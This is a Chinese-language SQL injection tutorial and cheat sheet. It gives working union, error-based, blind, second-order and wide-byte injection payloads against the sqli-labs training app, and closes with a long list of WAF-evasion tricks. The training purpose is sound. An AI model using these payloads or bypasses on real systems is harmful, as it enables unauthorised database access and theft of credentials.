SQL注入总结

SQL注入原理

SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断，前端传入的参数是攻击者可以控制，并且参数带入数据库的查询，攻击者可以通过构造恶意的 sql 语句来实现对数据库的任意操作。

例如：

SQL注入的危害

• 只要权限高，可以脱库
• 如果有写入权限，可以写入webshell
• 可以对数据库进行增删改查操作
• 可以逐步进行提权操作服务器

SQL注入的分类

按照提交方式分类

• GET型注入
• POST型注入
• Cooike注入
• header注入
• User-Agent注入
• Referer注入

按照数据类型分类

• int型注入
• string型注入
• like型注入

按照获取数据的方式分类

• 联合查询注入
• 报错注入
• 布尔盲注
• 时间盲注
• DNSlog盲注
• 堆叠注入
• 二次注入
• 宽字节注入

其他类型注入

• insert注入
• update注入
• delete注入

常用函数

注意：在information_schema数据库中SCHEMATA表中记录着所有数据库名称SCHEMA_NAME字段，TABLES表中记录着所有的表名 COLUMNS表中记录着所有的字段名称

函数名称	函数功能	函数名称	函数功能
system_user()	用户名	concat()	没有分隔符的连接
user()	用户名	concat_ws()	含有分隔符的连接字符串
current_user()	当前用户名	group_concat()	连接一个组的所有字符串，并以逗号分隔每一条数据
session_user()	链接数据库的用户名	load_file()	读取本地文件
database()	数据库名	into outfile	写文件
version() @@version	数据库版本	ascii()	字符串的ASCII代码值
@@datadir	数据库路径	ord()	返回字符串第一个字符的ASCII值
@@basedir	数据库安装路径	mid('字符串',起始位置,长度)	返回一个字符串的一部分
@@version_compile_os	操作系统	substr('字符串',起始位置,长度)	返回一个字符串的一部分
count()	返回执行的数量	length()	返回字符串的长度
left('字符串',个数)	返回字符串的最左边几个字符	sleep()	让此语句运行N秒钟，select sleep(3)
floor(参数-可以为小数)	返回小于或等于x的最大整数	if()	-> select if(1>2,2,3),如果为真，返回第二个参数，否则返回第三个参数; -> 3
rand()	返回0到1的随机数	char()	返回整数ASCII代码字符组成的字符串 ->select char(97) ->a
extractvalue()	第一个参数：XML document是String格式，为XML文档对象的名称，文中为Doc 第二个参数：Xpath string（Xpath格式的字符串） 作用：从目标XML中返回包含所查询的字符串	strcmp()	比较字符串内容
updatexml()	第一个参数：XML document是String格式，为XML文档对象的名称，文中为Doc 第二个参数：Xpath string（Xpath格式的字符串） 第三个参数：new_value，String格式，替换查找到的符合条件的数据 作用：改变文档中符合条件的节点的值	IFNULL()	假如参数1不为NULL，则返回参数1，否则其返回值为参数2 ->select ifnull(null,2) ->2
exp()	返回e的x次方	regexp	正则匹配 select user from mysql.user where user REGEXP '^admin'； 匹配user为admin开头的字段
hex()	编码，十进制数字/字符串 -> 十六进制。	desc	查看表结构信息

联合查询注入

UNION 语法：用于将多个select语句的结果组合起来，每条select语句必须拥有相同的列、相同数量的列表达式、相同的数据类型，并且出现的次序要一致，长度不一定相同。

select username,password from user union select id,flag from flag;

判断注入点

http://192.168.112.136:8080/Less-1/?id=1'

后端sql

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

猜字段数

order by 的作用为根据一列或者多列的值，按照升序或者降序排列数据，当超出表的列数是发生报错。

判断回显点

当第一个select语句获取的数据为 NULL 时，才会显示第二个 SELECT 语句中的列名。即第一个select语句要为false才行

所以http://192.168.112.136:8080/Less-1/?id=-1' union select 1,2,3 --+中的id为-1才能成功回显

查询数据库名称

方式1：

http://192.168.112.136:8080/Less-1/?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+

方式2：

http://192.168.112.136:8080/Less-1/?id=-1' union select 1,2,database() --+

查询表名

http://192.168.112.136:8080/Less-1/?id=-1' union select 1,2, (select group_concat(table_name) from information_schema.tables where table_schema='security') --+

查询表字段名称

http://192.168.112.136:8080/Less-1/?id=-1' union select 1,2, (select group_concat(column_name) from information_schema.columns where table_name='user') --+

查询表数据

http://192.168.112.136:8080/Less-1/?id=-1' union select 1,2, (select concat(username, password) from users limit 0,1) --+

报错注入

Mysql 在执行 SQL语句的时，如果语句有错会返回报错信息。但在与 PHP 结合使用的时候默认并不会把报错的信息在页面显示出来,可以在 PHP 文件中通过调用 mysql_error() 将错误显示在页面上。

报错函数

• floor()
• extractvalue()
• updatexml()
• exp()
• geometrycollection()
• multiponint()
• polygon()
• multipolygon()
• linestring()
• multilinestring()

floor()

利用 floor () 函数使 SQL 语句报错，实际上是由 rand () ， count () ， group by 三个函数语句联合使用造成的。
首先，看一下语句中使用到的函数和子句：

1. concat()： 连接字符串功能
2. floor()： 取float的整数值(向下取整）
3. rand()： 取0~1之间的随机浮点值
4. group by： 根据一个或多个列对结果集进行分组并有排序功能
5. floor(rand(0)*2)： 随机产生0或1
6. count() 对表中符合特定条件的所有行进行计数

使用floor(rand(0)*2)时,返回的值一直为011011

1. 查询第一条记录，rand(0)得键值0不存在临时表，执行插入，此时rand(0)再执行，得1，于是插入了1。
2. 查询第二条记录，rand(0)得1，键值1存在临时表，则值加1得2。
3. 查询第三条记录，rand(0)得0，键值0不存在临时表，执行插入，rand(0)再次执行，得键值1，1存在于临时表，由于键值必须唯一，导致报错。
   由上述可得，表中必须存在大于等于3条记录才会产生报错

当数据行数大于3, floor(rand(0)*2)必定报错

select count(*) from user group by concat(0x7e,database(),0x7e,floor(rand(0)*2));

以sqli-labs第5关为例：

#爆数据库
http://192.168.100.100:8080/Less-5/?id=1' union select 1,count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2))test from information_schema.tables group by test--+

#爆表
http://192.168.100.100:8080/Less-5/?id=1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2))test from information_schema.tables group by test--+

#爆字段
http://192.168.100.100:8080/Less-5/?id=1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e,floor(rand(0)*2))test from information_schema.tables group by test--+

#爆值
http://192.168.100.100:8080/Less-5/?id=1' union select 1,count(*),concat(0x7e,(select password from users limit 0,1),0x7e,floor(rand(0)*2))test from information_schema.tables group by test--+

extractvalue()

MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数，分别是ExtractValue()和UpdateXML()

因此在mysql 小于5.1.5中不能用ExtractValue和UpdateXML进行报错注入。

语法：EXTRACTVALUE (XML_document, XPath_string);

• 第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
• 第二个参数：XPath_string (Xpath格式的字符串).
• 作用：从目标XML中返回包含所查询值的字符串

第二个参数都要求是符合xpath语法的字符串，如果不满足要求，则会报错，并且将查询结果放在报错信息里

以sqli-labs第5关为例：

#爆数据库
http://192.168.100.100:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

#爆表
http://192.168.100.100:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))--+

#爆字段
http://192.168.100.100:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e))--+

#爆值
http://192.168.100.100:8080/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))--+

updatexml()

在mysql 小于5.1.5中不能用ExtractValue和UpdateXML进行报错注入。

语法： UPDATEXML (XML_document, XPath_string, new_value);

• 第一个参数：XML_document是String格式，为XML文档对象的名称
• 第二个参数：XPath_string (Xpath格式的字符串)
• 第三个参数：new_value，String格式，替换查找到的符合条件的数据

其实原理和extractvalue()是一样的，利用Xpath格式字符串不符合要求达到报错的效果，但是不一样的是，updatexml()有3个参数，要注意这一点。

以sqli-labs第5关为例：

#爆数据库名
http://192.168.100.100:8080/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

#爆表
http:192.168.100.100:8080/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+

#爆字段
http://192.168.100.100:8080/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)--+

#爆值
http://192.168.100.100:8080/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)--+

exp()

在mysql5.5之前，整形溢出是不会报错的，根据官方文档说明out-of-range-and-overflow，只有版本号大于5.5.5时，才会报错。

利用exp函数也产生类似的溢出错误

exp是以e为底的指数函数，但是，由于数字太大是会产生溢出。这个函数会在参数大于709时溢出，报错。

将0按位取反就会返回“18446744073709551615”，再加上函数成功执行后返回0的缘故，我们将成功执行的函数取反就会得到最大的无符号BIGINT值。

我们通过子查询与按位求反，造成一个DOUBLE overflow error，并借由此注出数据。

在脚本语言中，就会将错误中的一些表达式转化成相应的字符串,从而爆出数据。

以sqli-labs第5关为例：

#爆数据库
http://192.168.100.100:8080/Less-5/?id=1' union select 1,2,exp(~(select * from (select database())x))--+

#爆表
http://192.168.100.100:8080/Less-5/?id=1' union select 1,2,exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)x))--+

#爆字段
http://192.168.100.100:8080/Less-5/?id=1' union select 1,2,exp(~(select * from(select column_name from information_schema.columns where table_name='users' limit 0,1)x))--+

#爆值
http://192.168.100.100:8080/Less-5/?id=1' union select 1,2,exp(~(select * from(select username from users limit 0,1)x))--+

布尔盲注

相较于显错注入，反应会更隐晦，比如当执行的恶意语句条件为False时（如and 1=2），页面会变得异常，如页面突然没了数据，当条件为True时，页面又会恢复正常。并不会看到像显错注入那样明显的语句回显，这样的注入，我们就可以规定为布尔盲注。

布尔盲注常用函数

• substr(str,pos,len)：将str从pos位置开始截取len个字符进行返回。

• ord()：返回str最左面字符的ascii码值

• ascii()：返回str最左面字符的ascii码值

• length(str)：返回str字符串的长度

• if(a,b,c)：a为条件，a为true，返回b，否则返回c

• mid(str,pos,len)：将str从pos位置开始截取len个字符进行返回。

查询数据库长度

根据布尔类型的规则网页中只会返回true和false,用length判断数据库有几个字符

http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())>10--+
http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())=8--+

根据回显的页面判断数据正确与否，判断出数据库长度为8

查询数据库名称

我们已经判断完数据库的名字长度，接下来就来猜测数据库的第一个字母是什么

利用ascii函数和substr函数将数据库名切割为一个个的字符 然后使用转换为ascii码值 如果输入的ascii码值与查询出的值一样，则页面返回正确，否则页面返回不正常

http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr(database(),1,1))=101--+
http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr(database(),2,1))=101--+

根据更改pos值 可以找到正确的ascii值 数据库前两个字符为 se 可以编写python脚本来完成这一重复的工作。

查询数据库中的表，字段

查询出数据库的名字为security后我们按顺序查询表名的第一个字母

http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=101--+

判断出第一个字符为e

最后得到表名为emails，于是我们查询字段值的第一个字母

http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='emails'),1,1))=105--+

最后查到字段为id，可以编写脚本来自动循环跑出。（之前写过脚本）

时间盲注

根据页面是否休眠来判断返回的ascii码值正确与否 从而跑出数据

判断注入点

?id=1' and sleep(5)--+ //正常休眠

?id=1" and sleep(5)--+ //无休眠

?id=1') and sleep(5)--+//无休眠

?id=1") and sleep(5)--+//无休眠

?id=1' and if(length(database())=8,sleep(10),1)--+

爆出数据库，页面休眠五秒 证明数据库名第一个字符ascii值为115 即为s，以此类推判断出数据库名为security

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+

爆出数据表，页面休眠五秒 证明表名名第一个字符ascii值为101 即为e，以此类推判断出表名为email

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))=101,sleep(5),0)--+

爆出数据表字段，页面休眠五秒 证明表字段名第一个字符ascii值为101 即为i，以此类推判断出字段名为id

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='emails'),1,1))=105,sleep(5),0)--+

堆叠注入

因为在sql 查询语句中， 分号“；” 代表查询语句的结束。 所以在执行sql 语句结尾分号的后面，再加一条sql 语句，就造成了堆叠注入。

二次注入

二次注入可以理解为，攻击者构造的恶意数据存储在数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。防御者即使对用户输入的恶意数据进行转义，当数据插入到数据库中时被处理的数据又被还原，Web程序调用存储在数据库中的恶意数据并执行SQL查询时，就发生了SQL二次注入。

也就是说一次攻击造成不了什么，但是两次配合起来就会早成注入漏洞。

两次注入分别是插入恶意数据、利用恶意数据

第一次插入恶意数据

这里直接注册admin'#

然后更改密码 后端代码为

update users set password='$new_pass' where username='$user' and password='$old_pass';

如果我们注册一个这样的账号 admin'# 上述sql语句就变成这样

update users set password='$new_pass' where username='admin'# and password='$old_pass';

显而易见，语句原义被破坏，本来修改的是admin'# 用户的账号和密码，现在却是变成了直接修改admin用户的密码

这就是二次注入

宽字节注入

产生宽字节注入的原因涉及了编码转换的问题，当我们的mysql使用GBK编码后，同时两个字符的前一个字符ASCII码大于128时，会将两个字符认成一个汉字，那么大家像一个，如果存在过滤我们输入的函数（addslashes()、mysql_real_escape_string()、mysql_escape_string()、Magic_quotes_gpc）会将我们的输入进行转义。

例如addslashes()函数，这个函数的作用是返回在预定义字符之前添加反斜杠的字符串。

当我们传入

inde.php?id=1'

发现页面没有变化，因为这一题使用了addslashes()函数转义了特殊字符

假如传参为

inde.php?id=1%df'
经过转义后会变成
inde.php?id=1%df\' ---> inde.php?id=1%df%5c%27

而%df%5c再gbk编码中为一个汉字

可以看到我们的单引号没有被转义，从而达到了闭合单引号的效果

需要有个前提，也就是MYSQL设置了GBK编码：

set character_set_client=gbk

简单来说宽字节注入就是 后端在使用过滤函数 如addslashes()函数 对输入的特殊字符转义时，传入的数据为%df' 会将 ' 转义为 \'

这个时候根据gbk编码的规则两个字节为一个汉字%df与\的url编码%5c合并为两个字节%df%5c成为一个汉字从而逃逸出 '

绕过方式

注释符绕过

常用的注释符有：

1）-- 注释内容

2）# 注释内容

3）/* 注释内容 */

双写绕过

有些waf会对关键词进行过滤，若只过滤1次，则可以双写绕过。

等号绕过

1. 有的waf会对等于号进行拦截和过滤，使用like代替

UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name like "users"

1. rlike: 模糊匹配，只要字段的值中存在要查找的 部分 就会被选择出来，用来取代 = 时，rlike 的用法和上面的 like 一样，没有通配符效果和 = 一样

UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name rlike "users"

1. regexp:MySQL 中使用 REGEXP 操作符来进行正则表达式匹配

UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name regexp "users"

1. 使用大小于号来绕过

select * from users where id > 1 and id < 3

1. <> 等价于 !=，所以在前面再加一个！结果就是等号了

select * from users where !(id <> 1)

过滤大小于号绕过

1. greatest (n1, n2, n3…): 返回 n 中的最大值

select * from users where id = 1 and greatest(ascii(substr(username,1,1)),1)=116

1. least (n1,n2,n3…): 返回 n 中的最小值，与上同理。

1. strcmp (str1,str2): 若所有的字符串均相同，则返回 0，若根据当前分类次序，第一个参数小于第二个，则返回 -1，其它情况返回 1

select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),117)

1. in 关键字

select * from users where id = 1 and substr(username,1,1) in ('t')

1. between a and b: 范围在 a-b 之间，包括 a、b。

select * from users where id between 1 and 2

select * from users where id between 1 and 1

order by 绕过

当 order by 被过滤时，可以使用 into 变量名进行代替。

and/or绕过

主流的 waf 都会对and 、or、xor进行拦截。替代字符：and 等于&&、or 等于 ||、not 等于 !、xor 等于|

union select 绕过

uNIoN sel<>ect # 程序过滤<>为空 脚本处理
uNi//on sele//ct # 程序过滤//为空
uNIoN /!%53eLEct/ # url 编码与内联注释
uNIoN se%0blect # 使用空格绕过
uNIoN sele%ct # 使用百分号绕过
uNIoN %53eLEct # 编码绕过
uNIoN sELecT 1,2 #大小写绕过
uNIoN all select 1,2 # ALL绕过
uNIoN DISTINCT select 1,2 # 去重复DISTINCT 绕过
null+UNION+SELECT+1,2 # 加号代替空格绕过
/!union//!select/1,2 # 内联注释绕过
/!50000union//!50000select/1,2 # 内联注释绕过
uNIoN//select/**/1,2 # 注释代替空格绕过

大小写绕过

对关键词设置为大小写即可

逗号绕过

有些防注入脚本都会逗号进行拦截。变换函数的形式，

比如 substr(database(),1,1)—> substr(database() from 1 for 1) ；limit 0,1 —> limit 1 offset 0

使用 join 关键字来绕过

select * from users union select * from (select 1)a join (select 2)b join(select 3)c

上式等价于 union select 1,2,3

使用 like 关键字，适用于 substr () 等提取子串的函数中的逗号

select user() like "t%"

上式等价于 select ascii (substr (user (),1,1))=114

使用 offset 关键字，适用于 limit 中的逗号被过滤的情况，limit 2,1 等价于 limit 1 offset 2

select * from users limit 1 offset 2

上式等价于 select * from users limit 2,1

等函数替换

当常用函数被waf拦截时，可以使用偏僻函数或者功能相同的其他函数,比如substr()函数被拦截，就可以使用mid函数；报错注入的updatexml()用polygon()函数替换。

sleep() -->benchmark()

MySQL 有一个内置的 BENCHMARK () 函数，可以测试某些特定操作的执行速度。 参数可以是需要执行的次数和表达式。第一个参数是执行次数，第二个执行的表达式

select 1,2 and benchmark(1000000000,1)

ascii ()–>hex ()、bin ()，替代之后再使用对应的进制转 string 即可

group_concat ()–>concat_ws ()，第一个参数为分隔符

substr (),substring (),mid () 可以相互取代， 取子串的函数还有 left (),right ()

user() --> @@user、datadir–>@@datadir

ord ()–>ascii (): 这两个函数在处理英文时效果一样，但是处理中文等时不一致。

浮点数绕过

通过浮点数的形式从而绕过。id=1 union select —> id=1.0union select —> id=1E0union select

添加库名绕过

有些 waf 的拦截规则 并不会拦截[库名].[表名]这种模式。

ascii编码绕过

waf有的时候会对截取的字符拦截，可以使用ascii编码对比进行绕过。

base64编码绕过

waf有的时候会对截取的字符拦截，可以将注入的语句进行base64编码进行绕过

十六进制绕过

UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B

空格字符绕过

空格字符可以混淆WAF的检测机制。%20=%a0=%09=%0a=0b=%0c=%0d=+

可代替空格的方式：

1）/**/

2）()

3）回车 (url 编码中的 %0a)

4）`(tab 键上面的按钮)

5）tap

6）两个空格

eg：union/**/select/**/1,2

select (passwd) from (users) # 注意括号中不能含有 *

select`passwd`from`users`

引号字符绕过

若单引号被拦截，则使用双引号，若都被拦截，就尝试使用hex六进制编码，也可以考虑宽字节注入绕过

参数污染

在 php 语言中 id=1&id=2 后面的值会自动覆盖前面的值，不同的语言有不同的特性。可以利用这点绕过一 些 waf 的拦截。

注释绕过

内联注释：是Mysql为了保持与其他数据的兼容，将Mysql中特有的语句放在/!/中这些语句在不兼容的数据库中不执行，而在Mysql自身却能识别执行。例如：/!50001/表示数据库版本>=5.00.01时，/!50001 中间的语句才能被执行 /

内联注释就是把一些特有的仅在 MYSQL 上的语句放在 /*!...*/ 中，这样这些语句如果在其它数据库中是不会被执行，但在 MYSQL 中会执行。

脏数据溢出绕过

数据太多超过waf检测范围，然后造成绕过,前面填垃圾数据后面填要注入的SQL语句，如果是GET传参，参数值超过GET所能运行的长度可能无法利用，所以最好是POST传参(前提是对方支持POST传参)

GET/POST转换绕过

waf 在对危险字符进行检测的时候，分别为 post 请求和 get 请求设定了不同的匹配规则，请求被拦截，变 换请求方式有几率能绕过检测。

白名单绕过

有些 WAF 会自带一些文件白名单，对于白名单 waf 不会拦截任何操作，比如白名单目录，白名单文件等等，所以可以利用这个特点，可以进行突破。

花括号绕过

花括号，左边是注释的内容，这样的话可以过一些waf的拦截。

反引号绕过

特殊符号反引号也能绕过waf